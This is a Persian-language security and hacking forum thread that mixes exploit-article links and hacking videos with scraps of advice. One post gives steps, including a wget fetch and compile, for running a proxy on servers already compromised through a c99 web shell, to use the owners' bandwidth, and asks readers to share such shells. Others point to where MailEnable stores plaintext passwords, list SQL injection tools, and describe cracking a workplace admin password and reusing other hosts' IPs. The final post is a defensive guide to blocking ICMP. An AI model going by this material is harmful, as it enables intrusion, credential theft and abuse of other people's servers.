حال اين عدد به دو صورت قابل استفاده است. اگر روي هر يك از لينك هاي زير كليك كنيد وارد سايت yahoo مي شويد:

http://www.yahoo.com/
http://66.218.71.90/
http://0x42.0xda.0x47.0x5a/
http://0x42da475a/

D: Bin IP:
Example: http://1000010110110100100011101011010/
اين صورت IP در بيشتر سيستم ها و Browser ها كار نمي كند!
برنامه ماشين حساب را اجرا كرده و آن را در محيط علمي تنظيم كنيد. Dec را انتخاب كرده و IP خود را به Hex IP (دربالا گفته شد) تبديل كنيد.
Hexed IP: 42DA475A
سپس روي C بزنيد و Hex را انتخاب كنيد و عدد Hex شده را وارد كنيد. حال روي Bin بزنيد عدد به صورت زير نمايان مي شود:

Binary IP: 1000010110110100100011101011010

اگر Browser و ISP شما اين نوع IP را Support كند، با كليك بر روي لينك زير وارد سايت ياهو مي شويد:

http://1000010110110100100011101011010/
اميدوارم مورد استفاده قرار بگيره.

pastoo
09-05-2007, 09:42
مقالاتی بسیار عالی و حرفه ایی از آقای شهریار جلایری که پیشنهاد میکنم دوستداران امنیت آن را بخونن

مقالات(تحقیقات)

تمامی مقالات زیر حاصل تحقیق و بررسی موارد مختلف است. تمامی مقالات به زبان پارسی میباشند و استفاده از آن ها با ذکر نام نویسنده و منبع بل مانع است. امیدوارم توانسته باشم گامی هر چند کوچک در جهت ارتقاع سطح علمی شما عزیزان برداشته باشم. با تشکر — شهریار جلایری

Socket Programming and Exploiting with PHP (http://sn4k3.persiangig.com/Socket%20Programming%20and%20Exploiting%20with%20PHP.zip)(ا ردیبهشت ۱۱م, ۱۳۸۶)

توضیح : طریقه سوکت نویسی و ایجاد یک وب سرور و کلاینت سرور برای برقراری ارتباط با سرور.در این مقاله کاملا مبحث سوکت نویسی به زبان PHP مورد بررسی قرار گرفته و توضیح داده شده است. پس از خواندن این مقاله شما خواهید توانست یک وب سرور نوشته و آن را اجرا کنید. سپس به بررسی قابلیت های PEAR برای سوکت نویسی و پس از CURL مورد تحلیل قرار گرفته اند . در آخر به بررسی و چگونگی نوشتن اکپلویت برای آسیب پذیری های مختلف پرداخته و برای هر یک مثالی زده شده است.نکته قابل عرض در مورد این مقاله : این مقاله تنها مقاله و کاملترین مقاله فارسی در مورد سوکت نویسی در زبان PHP است.

نویسنده : شهریار جلایری — تاریخ نگارش یازدهم اردیبهشت 1386

Command Execution Vulnerability Disclose (http://sn4k3.persiangig.com/Command%20Execution%20Vulnerability%20Disclose.zip)(فرور دین ۲۴م, ۱۳۸۶)

توضیح : در این مقاله به بررسی آسیب پزیری اجرای فرامین بر روی سرور از راه دور توسط برنامه های کاربردی وب میپردازیم. سپس چگونگی کشف ای نوع باگ ها را با مثال بررسی میکنیم.

نویسنده : شهریار جلایری – تاریخ نگارش بیست وچهارم فرودین 1386

Buffer OverFlows Vulnerability Disclose (http://sn4k3.persiangig.com/Buffer%20Overflows.zip)(اسفند ۱۶م, ۱۳۸۵)

توضیح : در این مقاله ابتدا به بررسی انواع توابع آسیب پذیر در زبان C و سپس نحوه نوشتن شلکد میپردازیم. پس از آن یک برنامه آسیب پذیر نوشته و آن را اکسپلویت میکنیم و در آخر یک برنامه آسیب پذیر را به صورت ریموت مورد حمله قرار داده و آن را اکسپلویت میکنیم.


نویسنده : شهریار جلایری – تاریخ نگارش یکم اسفند 1385

Null Byte Article (http://sn4k3.persiangig.com/NULL%20Byte.pdf)(آبان ۱۰م, ۱۳۸۵)

توضیح : مقاله ای کوتاه در مورد این کد جادویی و استفاده های آن در جاهای مختلف.

نویسنده : شهریار جلایری – تاریخ نگارش دهم آبان 1385

Analysis of brute force & dictionary attacks (http://sn4k3.persiangig.com/Analysis%20of%20brute%20force%20%26%20dictionary%20attacks.z ip)(مهر ۱۸م, ۱۳۸۵)

توضیح : در این مقاله ابتدا به بررسی حملات ورود به زور پرداخته و به وسیله یک سورس کد سعی در کرک کردن هش های رمز شده به صورت MD5 میپردازیم. سورس کد را آنالیز میکنیم وتمام مراحل قبل را برای حملات دیکشنری تکرار میکنیم.

نویسنده : شهریار جلایری – تاریخ نگارش هجدهم مهر 1385

Write Injection Exploit Whit Shell Programming (http://sn4k3.persiangig.com/exploit.pdf)(مهر ۱۶م, ۱۳۸۵)

توضیح : مقاله ای کوتاه در مورد نوشتن اکسپلویت با شل اسکریپت نویسی در لینوکس برای آسیب پذیری رایج تزریق کد های Sql.



نویسنده : شهریار جلایری – تاریخ نگارش نوزدهم مرداد 1385

Shell Script in Linux/Unix (http://sn4k3.persiangig.com/shell%20Script%20in%20Linux%20and%20unix.zip)(مرداد ۱۷م, ۱۳۸۵)

توضیح : مقدماتی بر شل اسکریپت نویسی در یونیکس

نویسنده : شهریار جلایری – تاریخ نگارش هفدهم مرداد 1385

Remote File Inclusion Vulnerability Disclose (http://sn4k3.persiangig.com/Remote%20File%20Inclusion.zip)(مرداد ۱۷م, ۱۳۸۵)

توضیح : مقاله ای در مورد چگونگی کشف ای نوع آسیب پذیری در بذ نامه های کاربردی وب نوشته شده با زبان PHP.

h_nasa
16-05-2007, 12:36
سلام
من کافی نت دارم می خواهم دیگران دانلود نکنند چه در موزیلا وچه در اپرا وچه در اینترنت اکسپلور چکار یا اقداماتی انجام دهم تا دیگران دانلود نکنند راهنمایی کنیدنرم افزار خاصی است یا نه


سلام از دوستان خواهش می کنم جواب بالا را بدهند

سلام کسی نیست جواب مرا بدهد

bahador
16-05-2007, 13:41
سلام
من کافی نت دارم می خواهم دیگران دانلود نکنند چه در موزیلا وچه در اپرا وچه در اینترنت اکسپلور چکار یا اقداماتی انجام دهم تا دیگران دانلود نکنند راهنمایی کنیدنرم افزار خاصی است یا نه


سلام از دوستان خواهش می کنم جواب بالا را بدهند

سلام کسی نیست جواب مرا بدهد

دوست عزیز
تا جایی که بنده اطلاع دارم نمی‌توانید دانلود کردن را مسدود کنید.
(( یعنی صفحات وب باز شوند ولی فایل نتوان دانلود کرد ))

اما دانلود اختصاص یافته به یک آی‌پی را می‌توان محدود کرد (( مثلا از 32 کیلوبایت در ثانیه آن را به 1 رساند که باعث دیر باز شدن صفحات می‌شود ))

اما اجازه دهید تا از دیگر دوستان این‌کاره بپرسم و درست راهنمایی‌تان کنم.

pastoo
16-05-2007, 23:11
من هم فکر نمیکنم امکان داشته باشه مگه اینکه بتوانی 1 فایروال قوی configour کنی و امکان تغییر فایروال را به یوزر ها ندهی .

باید روش فکر کنم خودت هم روش کار کن به نتیجه رسیدی اینجا اعلام کن

در ضمن همیشه دوستان توجه داشته باشند که کجا سوال میکنن و در چه زمینه ایی ؟

موفق باشید

pastoo
21-05-2007, 09:49
فكر كنم اين روش از اون روش هاي خيلي زيبا براي درست كردن پروكسي سرور (ip:port ) براي مخفي ماندن در اينترنت با دسترسي پايين ميباشد .

ابتدا به يكي از جاهايي كه c99 و يا امثال آن را upload كرده ايد وارد شويد (اجازه exec بايد داشته باشيد )

سپس يك فولدر با هر نامي همانند test ميسازيد .

حالا نوبت به دريافت برنامه اعجاب انگيزه روسي : 3***** است .

خوب حالا طريقه نصب :

كد:

wget http://security.nnov.ru/soft/3*****/0.5.2/3*****.tgz

tar xvzf 3*****.tgz



حالا طبق نوع سرور (اغلب لينوكسي فايل ها را با دسرسي پايين با دستور زير كامپايل ميكنيم )

كد:

make -f Makefile.unix



خوب كار تمام است : وارد پوشه SRC شويد و با دستور :

كد:

./3*****



موتور اصلي رو اجرا كنيد .
يك shell جديد باز كنيد (در داخل همان پوشه ) دستور زير را تايپ كنيد .

كد:

./***** -p3129 -n -a



خو حالا كار تمام است ، سرور ما با دسترسي پايين ، بر روس process هاي موقت (تا لحظه reset شدن آپاچي و يا سرور ) آماده استفاده است .

خوب ip سرور را بر داشته و با پورت 3129 در تنظيمات پروكسي browser به آن كانكت شويد .

چند نكته :

1- هر از چند گاهي در سرور هايي كه cpanel دارند ، به علت update شدن آپاچي و rset شدن آن پروكسي را run كنيد : با همان دستور آخر ...

2-پروكسي ها را به افراد مختلف ندهيد ، والا صاحب سرور بدبخت ميفهمد كه داريد از پهناي باند او استفاده ميكنيد .

3- خوش باشيد . (زحمت داشت كه به دنبالش بگردم ، اما ميبينيد كه ارزشش رو داشت .)
------------------------
خواهشا جاهايي رو كه پروكسي ساختيد اينجا بزاريد .(همراه با لينك shell كه بتوتان اگر پروكسي از كار افتاد اون رودوباره run كرد )

نویسنده : حسین عسگری

pastoo
21-05-2007, 09:50
توجه کنید که به جای ستاره نام p r o x y را سر هم بزنید

h_nasa
23-05-2007, 10:15
sسلام
اساتید راهنمایی کنند من کافی نت دارم وخط ادسل دارم وشبکه ام در ست کار می کند وتمام یوزرها درست کار می کنند در بعضی مواقع ادسل قطع می شود واز دیالاپ استفاده کنم اما هر کار می کنم کامپیوترهای دیگر از دیالپ استفاده کنند نمی شود من انواع کارها را انجام دادم برنامه دیالاپ را هم شر هم کنم باز هم نمی شود واز شبکه ام خارج می شود راهنمایی کنید

pastoo
27-05-2007, 00:23
امروز تو سیمرغ مطالبی دیدم که حسین در این رابطه جمع بندی خوبی کرده بود

چند وقتی هست تصمیمی با دوستان گرفتیم تا حملات مختلفی رو که در زمره Hacking و علوم ضد امنیت قرار میگیرند با نام :

تمامی مردان پادشاه .

جمع آوری کنیم .
ممنون میشم دوستان در این قسم من و دوستان دیگشون رو یاری کنن ..

--------------------------------------------------------------------------------------

بحث Sql Injection داره همانند خیلی از روشهای دیگه به تاریخ هکر ها می پیونده ، درسته که با ترفند هایی میشه bypass رو انجام دارد ، ولی واقعا این روش ها داره هر روز پیچیده تر میشه .

باید چه کار کرد :
1- آخرین دستاورد ها رو مطاله کرد .
2- ابزار های نوشته شده رو خوند .
3- Vule های جدید رو بررسی کرد .
4- و در آخر روش های bypass جدید رو کشف کرد .


میبینیم که بدون 3 قسمت اول قسمت آخر (مدینه فاضله ) خیلی دور به نظر میرسه .

در بخش اول مقالات منتظر جمع آوری مقالات فارسی و بعد انگلیسی و نیز ابرار های این کار هستیم .

نکته :
نتایج بحث های اینچنینی در سیمرغ جمع آوری و به صورت یک pack در میاد :
http://www.simorgh-ev.com/security/modules/mysections/singlefile.php?lid=300

pastoo
27-05-2007, 23:24
vule خيلي عجيب غريبي در mail Enable (تحت ويندوزي ) وجود دارد ، با اينكه خيلي از سرور هاي ايراني از آن استفاده ميكنند ، اما خيلي اصطلاحا سوراخ و سمبه داره !!

سيستم آسيب پذير : Mail Enable - windows version
درجه خطر : خطرناك
نوع آسيب پذيري : DB Hacking - local

تاريخ كشف : بهار 1384


هنگامي كه شما از يك سرور ويندوزي يك shell به دست آورده ايد ، در صورتي كه mail enable به صورت پيشفرض نصب شده باشد ، شما ميتوانيد آن را program files (كه حق دسترسي خواندن تا 99% هميشه وجود دارد ) پيدا كنيد .

وارد فولدر برنامه شده و مسير را به اين گونه ادامه بدهيد :

c:\Program Files\Mail Enable\Config\

خوب در آنجا يك فايل با نام AUTH.SAV
وجود دارد كه در داخل آن ، تمامي user name ها و password هاي افراد بدون اينكه hash شوند قرار دارند .

نكته : تا جايي كه تحقيق كردم اين DB حاوي پسورد ، احتمالا در هنگام Backup گيري از data base اصلي اينجا ذخيره ميگردد !

pastoo
07-06-2007, 17:36
این یک فیلم حدود 50 دقیقه هست که از طریق کلاینت هکینگ دوستمون وارد یک سیستم میشه دیدنش خالی از لطف نیست
http://shadowes.persiangig.com/video/client.rar (http://shadowes.persiangig.com/video/client.rar)

این هم فیلم اسنیف کردن یک شبکه و استخراج پسورد ادمین شبکه با نرم افزار cain

http://shadowes.persiangig.com/video/cain.rar (http://shadowes.persiangig.com/video/cain.rar)

یک فیلم کلاینت هکینگ با متد کاملا نوین و بدون استفاده از تروجان و با ترکیب دو برنامه interlaced و nc
http://shadowes.persiangig.com/video/interlaced.rar (http://shadowes.persiangig.com/video/interlaced.rar)

فیلم سرور هکینگ با استفاده از برنامه local file inclusion (lfi) و با استفاده از برنامه brutus

http://shadowes.persiangig.com/video/passwd.rar (http://shadowes.persiangig.com/video/passwd.rar)

نفوذ و روت گرفتن از سرور با استفاده از ip invalid و انتقال شل توسط nc

http://shadowes.persiangig.com/video/rele.rar (http://shadowes.persiangig.com/video/rele.rar)

فیلم دکود کردن پسورد و نفوذ به ftp با استفاده از باگ موجود در ws_ftp

http://shadowes.persiangig.com/video/ws-ftp.rar (http://shadowes.persiangig.com/video/ws-ftp.rar)

روش نوین برای استفاده از باگ های xss

http://shadowes.persiangig.com/video/xss.rar (http://shadowes.persiangig.com/video/xss.rar)

استخراج و کرک پسورد lm و ntlm هش از داخل dos

http://papet.persiangig.com/video/SAM_CRACK.RAR (http://papet.persiangig.com/video/SAM_CRACK.RAR)

فیلم آموزشی نصب لینوکس نسخه ubuntu linux

http://papet.persiangig.com/video/Ubuntu-install.rar (http://papet.persiangig.com/video/Ubuntu-install.rar)

فیلم آموزشی باز کردن پورت و روت کردن سرور با استفاده از باگ quarze.pl لازم به ذکر است سال گذشته با همین باگ سایت unesco هم دیفیس شد توسط تیم امنیتی ویرانگر

http://papet.persiangig.com/video/cgi-bug.rar (http://papet.persiangig.com/video/cgi-bug.rar)

فیلم آموزشی تقریبا کامل نحوه پیدا کردن باگ های rfi و نحوه تست cms ها از طریق لوکال و اکسپلویت کردن و مهمتر از همه چیز نحوه پچ کردن باگ هست

http://papet.persiangig.com/video/rfi.rar (http://papet.persiangig.com/video/rfi.rar)

فیلم آموزشی پیدا کردن باگ های sql در سایت و اکسپلویت کردن آنها و در نهایت استخراج پسورد ادمین با استفاده از inject کرن و نفوذ به سرور با استفاده از اسکنر

http://www.parsaspace.com/satan/shadowes/sql-xss.rar (http://www.parsaspace.com/satan/shadowes/sql-xss.rar)

pastoo
13-06-2007, 09:42
این کلیپ رو خیلی وقت پیش میخواستم بزارم نشد !
انتقال شل بین دو سیستم عامل ( لینوکس لینوکس ) , همه چیز گویا هست !
آموزش تصویری رو از اینجا (http://www.sc0rpion.ir/tutorial-clips/get-shell-via-Transfer-shell-between-servers(Linux%20servers).rar) میتونید بگیرید

pastoo
13-06-2007, 09:50
سرریز بافر در پشته!
داشتم فیلم میگرفتم یه مگسه همش میومد جلو مانیتور ! هر کی گرفتش جایزه داره!!!
اکسپلویت کردن به صورت لوکال (http://sn4k3.persiangig.com/Win%20Local%20Stack%20Overflow.rar)
اکسپلویت کردن به صورت ریموت (http://sn4k3.persiangig.com/Win%20Remote%20Stack%20Overflow.rar)
حتما اول لوکال رو ببینید و بعد ریموت!
عزیزان میتونن برای اکسپلویت کردن به صورت لوکال برنامه ای که میگزارم رو اکسپلویت کنند و ریموت هم میتونند CC***** 6.2 رو اکسپلویت کنن!

pastoo
13-06-2007, 10:23
قسمت اول

حجم دریافتی: 108 کیلو بایت

زمان کلیپ: تقریباً 8 دقیقه!



قسمت دوم - شل کدینگ ( دوستان حتماً قسمت 1 رو باید اول دیده باشند وگرنه چیزی متوجه نمیشند )

دریافتی : 418 کیلو بایت

زمان کلیپ: 15 دقیقه





قسمت سوم - اکسپلویتینگ

دریافتی : 540 Kb (اصلاح شد)

زمان کلیپ: 18:19 دقیقه



دوستان بازم تاکید میکنم قسمت ها دسته بندی هست باید بترتیب ببینید ! 1 - 2 - 3 !

am9
18-06-2007, 14:59
یک سوال از دورستان گرامی،

ما در شرکتی کار می کنیم که آنها اولا:
بسیاری از سایت های معمولی را هم بسته اند.
ای میل ها (از جمله جی میل و یاهو) بسته شده است.
سرعت شبکه را برای برخی زیاد و اکثریت کم کرده اند
امکان استفاده از نرم افزارهای فایل شیرینگ وجود ندارد
و دانلود 95 درصد افراد هم بسته است (به جز موارد استثنایی مانند پسوندهای رار که ظاهرا سیستم فیلترینگ تشخیص نمی دهد).
از اینها بدتر، کاربران اجازه آب خوردن در کامپیوتر خود را ندارند و هر کاری نیاز به پسورد ادمین دارد.
بنده مدتی پیش با استفاده از نرم افزار ophcrack به راحتی پسورد ادمین را حداقل برای نصب برنامه پیدا می کردم که نمی دانم چه کرده اند، دیگر جز پسور یوزر، ادمین را پیدا نمی کند.
یکی هم گفته بود که فایل sam را از جایی به جای دیگری (الان یادم نیست) کپی کنم که حتی وقتی با اسلکس سیستم را بالا می آوردم اجازه نوشتن روی sam را نمی دهد.
تنها روزنه امید یکی از نرم افزارهای پروکسی است که با سرعت بسیار پایین (در حد چند کیلو بایت) اجازه می دهد فایل شیرینگ را انجام داد.
آیا راهی برای این آفات هست؟
با تشکر

pastoo
18-06-2007, 21:01
دوست من شما باید توضیحات کافی را اینجا بزارید
1) نوع سیستم عامل
2) نوع پارتیشن بندی
3) نوع فرمت بندی
4) سیستم عامل سرور
5) نوع شبکه
6) نوع نرم افزار مدیریت شبکه شما

شما کرک دستی sam را چک کردی؟

am9
19-06-2007, 09:27
با سلام مجدد
سيستم عامل ما كه همه ويندوز XP است و تا آنجا كه مي دانم سرور بايد ويندوز 2003 باشد.
پارتيشن بندي ما هم كه ويژگي خاصي ندارد، در مورد سرور هم اطلاع ندارم (اگر منظور شما آن است)
آدرس تايپ DHCP است (اگر كمكي مي كند) و ما به وسيله كابل و هاب به شبكه وصل مي شويم. در موقع وصل شدن شبكه يك آي پي مشخص (كه براساس آن به ما نوع خدمات اينترنت را مي دهند) به كامپيوتر ما اختصاص مي دهد.
sam دستي را بلد نبودم و خوشحال مي شوم اگر بفرماييد چطور مي توانم تغيير دهم البته يكي دو بار به قسمت مديريت كاربرها رفتم و آنجا خواستم تغيير دهم كه همان جمله access denied را مي داد.
ضمنا از آنجا كه در كامپيوتر هاي اينجا امكان تغيير آي پي را هم برداشته اند من گاهي با اسلكس سيستم را بالا مي آورم و با جستجو در آي پي ها، گاهي يك آي پي بازتر پيدا مي كنم اما نگرانم كه نكند آنها بفهمند كدام كامپيوتر است كه با آي پي جديد (يا duplicate) وارد شده است، آيا چنين هست؟

متشكرم

am9
21-06-2007, 18:33
باز هم سلام

اگر چه كسي جواب نداد اما از آنجا كه جوينده يابنده است، بنده به نرم افزار جالبي به نام Hiren برخورد كردم كه روي سي دي رايت مي شد. اين برنامه داراي قسمت هاي مختلف كمكي از جمله بخش پسورد بود كه به راحتي پسورد ويندوز را حذف كرد.

jeniuse
23-06-2007, 13:10
با سلام خدمت دوستان عزيز :
ميخواستم بدونم چطوري ميتونم متوجه بشم توي Domain روي يك كامپيوتر چه Userي Login كرده ؟؟؟؟/؟;)

am9
23-06-2007, 16:40
با سلام خدمت دوستان عزيز :
ميخواستم بدونم چطوري ميتونم متوجه بشم توي Domain روي يك كامپيوتر چه Userي Login كرده ؟؟؟؟/؟;)

سلام
اگر منظور شما اين است كه شما مي خواهيد ببينيد كسي كه به شبكه (سرور)‌ وصل شده و الان كامپيوتر او روشن است، با چه يوزري وارد شده، فكر مي كنم اگر به قسمت كنترل پنل رفته و به بخش يوزرها برويد، مي توانيد متوجه بشويد.

jeniuse
23-06-2007, 17:05
سلام
اگر منظور شما اين است كه شما مي خواهيد ببينيد كسي كه به شبكه (سرور)‌ وصل شده و الان كامپيوتر او روشن است، با چه يوزري وارد شده، فكر مي كنم اگر به قسمت كنترل پنل رفته و به بخش يوزرها برويد، مي توانيد متوجه بشويد.
با تشكر از شما، ولي منظورم اينه كه مثلا اگه اسم كامپيوتر من x.y.com هست ميخوام بدونم كه روي كامپيوتر z.y.com در حال حاضر چه userي logoin كرده؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

pastoo
23-06-2007, 21:37
با تشكر از شما، ولي منظورم اينه كه مثلا اگه اسم كامپيوتر من x.y.com هست ميخوام بدونم كه روي كامپيوتر z.y.com در حال حاضر چه userي logoin كرده؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

دوست من شما اگر به عنوان 1 یوزر بخواهید بفهمید که در شبکه چه کامپیوتر هایی روشن است باید آن کامپیوتر را ping کنی اما اگر میخواهید بفهمید که کدام یوزر از آن کامپیوتر آنلاین است باید شبکه را sniff کنی که کارت را خیلی سنگین میکنی


موفق باشید

pastoo
23-06-2007, 22:47
تمامی مردان پادشاه .

جمع آوری کنیم .
ممنون میشم دوستان در این قسم من و دوستان دیگشون رو یاری کنن ..

--------------------------------------------------------------------------------------

بحث Sql Injection داره همانند خیلی از روشهای دیگه به تاریخ هکر ها می پیونده ، درسته که با ترفند هایی میشه bypass رو انجام دارد ، ولی واقعا این روش ها داره هر روز پیچیده تر میشه .

باید چه کار کرد :
1- آخرین دستاورد ها رو مطاله کرد .
2- ابزار های نوشته شده رو خوند .
3- Vule های جدید رو بررسی کرد .
4- و در آخر روش های bypass جدید رو کشف کرد .


میبینیم که بدون 3 قسمت اول قسمت آخر (مدینه فاضله ) خیلی دور به نظر میرسه .

در بخش اول مقالات منتظر جمع آوری مقالات فارسی و بعد انگلیسی و نیز ابرار های این کار هستیم .

نکته :
نتایج بحث های اینچنینی در سیمرغ جمع آوری و به صورت یک pack در میاد :
http://www.simorgh-ev.com/security/modules/mysections/singlefile.php?lid=300 (http://www.simorgh-ev.com/security/modules/mysections/singlefile.php?lid=300)



اینجا سعی در جمع آوری Tools هایی در این زمینه میکنیم .

چند ابزار Sql Injection :

1- ابزار اتوماتيک حملات Blind Sql Inection با نام : SQLMAP
http://sqlmap.sourceforge.net (http://sqlmap.sourceforge.net/)

2- ابزار کوچک برای حملات Sql inect در دیتابیس ماکروسافت : Sqlninja
http://sqlninja.sourceforge.net/ (http://sqlninja.sourceforge.net/)

3- ابزار اتوماتيک power Sql injector
http://www.sqlpowerinjector.com (http://www.sqlpowerinjector.com/)

http://www.sqlpowerinjector.com/img/SPInjNormalMode.JPG

4- ابزار اتوماتيک bobcat :
http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html (http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html)

5- ابزاری برای حملات sqlinject . (ابزاری با جاوا )
http://www.0x90.org/releases/absinthe/download.php (http://www.0x90.org/releases/absinthe/download.php)

6- ابزار گرافيکي و بسيار قدرتمند : priamos
http://www.priamos-project.com/versions.htm (http://www.priamos-project.com/versions.htm)

http://www.priamos-project.com/images/whatis/priamos.gif



با تشکر از سیمرغ و حسین عسگری

jeniuse
24-06-2007, 11:28
دوست من شما اگر به عنوان 1 یوزر بخواهید بفهمید که در شبکه چه کامپیوتر هایی روشن است باید آن کامپیوتر را ping کنی اما اگر میخواهید بفهمید که کدام یوزر از آن کامپیوتر آنلاین است باید شبکه را sniff کنی که کارت را خیلی سنگین میکنی


موفق باشید
منظورم همينه با چه Snifferي ميتونم اين كار رو انجام بدم ميشه يه كم راهنمايي كنيديا يك مقاله در اين مورد به من بديد..
مرسي

pastoo
24-06-2007, 22:54
شما با استفاده از dsniff در سیستم لینوکس میتوانید در شبکه به انتظار بشینی باید دسترسی locall به شبکه داشته باشی . در رابطه با sniff در همین تایپیک چندین مقاله آموزشی گذاشتم بگردی پیدا میکنی

pastoo
28-06-2007, 13:03
سلام
در این مقاله نحوه ی Block کردن بسته های ICMP روی سرور که در نهایت باعث جلوگیری از Ping شدن خود سرور و کلاینت هایی که به سرور متصل هستند میشه رو مورد برسی قرار خواهیم داد.خوب ممکن هست این سئوال برای شما مطرح بشه که این کار چه سودی داره؟ ببینید همونطور که میدونید اولین گام برای نفوذ به شبکه ،شناسایی شبکه ی هدف هست.به عنوان مثال اگر فردی قصد نفوذ به شبکه شما رو داشته باشه اولین چیزی که نیاز داره range IP شبکه ی شما خواهد بود تا کامپیوترهای فعال رو پیدا کنه و نقاط آسیب پذیرشون رو مورد هدف قرار بده.
خوب، range IP شبکه ی شما (مثلاً ISP) برای نفوذگر کاملاً مشخص هست چون range IP تمام شبکه هایی که با valid IP فعالیت دارند در مراکزی مثل "مرکز هماهنگی های RIPE" ثبت میشه و نفوذگر میتونه به راحتی بهشون دسترسی داشته باشه چون دسترسی به این اطلاعات برای عموم آزاد هست.بعد از بدست آوردن range IP نفوذگر بر روی یک چیز تمرکز میکنه و اون هم پیدا کردن کامپیوترهای فعال روی شبکه ی شما هست.برای اینکار برنامه های متعددی مثل NMAP نوشته شدن و این قابلیت رو دارن که با Ping Scan در عرض چند ثانیه با Ping کردن Range IP شبکه شما گزارش آدرسهای IP فعال بر روی شبکه رو به نفوذگر ارائه کنن،نمونه ای از یک Scan که با همین نرم افزار انجام شده رو در زیر میبینید :


Code:
D:\Tools\nmap>nmap -sP 192.168.1.*Host 192.168.1.1 appears to be up.Host AClient (192.168.1.2) appears to be up.Nmap finished: 256 IP addresses (2 hosts up) scanned in 8.360 seconds
حالا به جواب سئوال رسیدیم،جلوگیری از Ping شدن شبکه میتونه راهی باشه برای کوتاه نگاه داشتن دست نفوذگر از پویش در شبکه.در ادامه نحوه ی جلوگیری از Ping شدن شبکه با تعریف یک Policy در IPSec رو با هم مرور میکنیم.
ابتدا در Run عبارت SecPol.msc رو تایپ و Enter کنید.با انجام این عمل پنجره ای مشابه شکل زیر رو مشاهده خواهید کرد.



http://securekrnl.persiangig.com/image/tgs/BLOCK_ICMP/00.gif

قبل از انجام هر کاری بهتر هست هدفمون در این کنسول رو بدونیم.هدف ما ایجاد یک Policy یا "سیاست" هست که بر طبق این سیاست تمام ترافیک ICMP روی شبکه Block بشه.برای اینکار باید دو چیز برای IPSec مشخص باشه،اولی پروتکل ICMP و دومی مفهوم Block هست.خوشبختانه IPSec پروتکل ICMP رو به صورت پیش فرض به عنوان Filter داره و تنها چیزی که نیاز به تعریفش داریم یک Filter Action هست که مفهوم Block رو مشخص کنه.
برای تعریف مفهوم Block به صورت زیر بر روی IP Security Policies on Local Machine راست کلیک و گزینه ی Manage IP filter lists and filter actions رو انتخاب کنید.



http://securekrnl.persiangig.com/image/tgs/BLOCK_ICMP/01.gif

حالا پنجره ای مقابل شما قرار گرفته که باید سربرگ دومش یعنی Manage Filter Actions رو انتخاب کنید.در این سربرگ بعد از حصول اطمینان از اینکه چک باکس Use AddWizard در پایین پنجره فعال هست بر روی دکمه ی Add کلیک کنید.با انجام این کار پنجره ی Filter Action Wizard باز میشه که در اینجا فقط گذرا گزینه هایی که در هر مرحله باید انتخاب کنید رو عنوان میکنم.
1- در اولین مرحله که مرحله ی خوش آمد گویی! هست Next رو کلیک کنید.
2- در مرحله ی بعد در قسمت مربوط به Name که بالا قرار داره بنویسید "Block" و در قسمت مربوط به Description عبارت "Block Access" رو تایپ کنید و Next رو بزنید.
3- در مرحله ی بعد دکمه ی رادیویی Block رو انتخاب کنید و Next رو بزنید.
4- در آخر هم بر روی Finish کلیک کنید.
تا اینجای کار مفهوم Block مشخص شد،حالا باید پروتکل ICMP رو تابع فیلتر Block بکنیم. این کار با تعریف یک Policy امکان پذیر هست بنابراین برای تعریف این Policy مراحل زیر رو دنبال می کنیم.
دوباره در پنجره ی اصلی روی IP Security Policies on Local Machine راست کلیک کنید اما این بار گزینه ی اول یعنی Create IP Security Policy رو به صورت زیر انتخاب کنید.



http://securekrnl.persiangig.com/image/tgs/BLOCK_ICMP/02.gif

با انجام این عمل پنجره ی IP Security Policy Wizard باز میشه.مراحلی که در این Wizard باید انجام بدید رو هم در ادامه به صورت مرحله به مرحله و سریع عرض میکنم خدمتتون.
1- در مرحله ی اول که همون پنجره ی خوش آمد گویی هست و اول همه Wizard ها وجود داره دکمه ی Next رو انتخاب کنید.
2- در مرحله ی بعد در قسمت Name عبارت "Block ICMP" و در قسمت Description عبارت "Preventing ICMP Echo Replies" رو تایپ کنید و Next رو بزنید.
3- در مرحله ی بعد چک باکس Active the Default response rule رو غیر فعال کنید و Next رو کلیک کنید.
4- در مرحله ی آخر چک باکس Edit Properties رو فعال نگه دارید تا بعد از کلیک روی دکمه ی Finish پنجره ی Properties مربوط به Policy باز بشه.روی Finish کلیک کنید!
حالا میرسیم به آخرین بخش،در پنجره ای زیر که الان رو به روی شما قرار داره پس از حصول اطمینان از فعال بودن چک باکس Use Add Wizard روی دکمه ی Add کلیک کنید.



http://securekrnl.persiangig.com/image/tgs/BLOCK_ICMP/03.gif

پنجره ای که بعد از کلیک روی دکمه ی Add مقابل شما قرار میگیره آخرین Wizard ای هست که باید اطلاعات لازم رو بهش بدید.این Wizard رو هم مرحله به مرحله دنبال می کنیم.
1- در مرحله ی اول روی دکمه ی Next کلیک کنید.
2- در مرحله ی بعد هم بدون انجام تغییرات روی Next کلیک کنید.
3- در مرحله ی سوم، اولین دکمه ی رادیویی که All Network Connections هست رو انتخاب کنید و روی Next کلیک کنید.(با انتخاب این گزینه ی ترافیک ICMP بر روی تمام گذرگاههای Block خواهد شد.)
4- در مرحله ی بعد هم نیاز به انجام تغییری نیست،روی Next کلیک کنید.با کلیک روی Next در صورتی که کامپیوتر جزو یک Domain نباشه پنجره ای باز میشه که در اون Yes رو انتخاب کنید.
5- در این مرحله دکمه ی رادیویی All ICMP Traffic رو انتخاب کنید و Next رو بزنید.
6- در مرحله بعد دکمه ی رادیویی Block رو انتخاب کنید و روی Next کلیک کنید.
7- در مرحله ی آخر هم دکمه ی Finish رو بزنید و تمام...
اگر پنجره های اضافه رو ببندید و به پنجره ی اصلی توجه کنید میبینید که به صورت زیر یک Policy به نام Block ICMP به پنل راست صفحه اضافه شده.



http://securekrnl.persiangig.com/image/tgs/BLOCK_ICMP/04.gif

حالا در مرحله نهایی باید این Policy رو فعال کنیم.برای فعال کردن هر Policy باید به صورت زیر روی اون راست کلیک و گزینه ی Assign رو انتخاب کنید.



http://securekrnl.persiangig.com/image/tgs/BLOCK_ICMP/05.gif

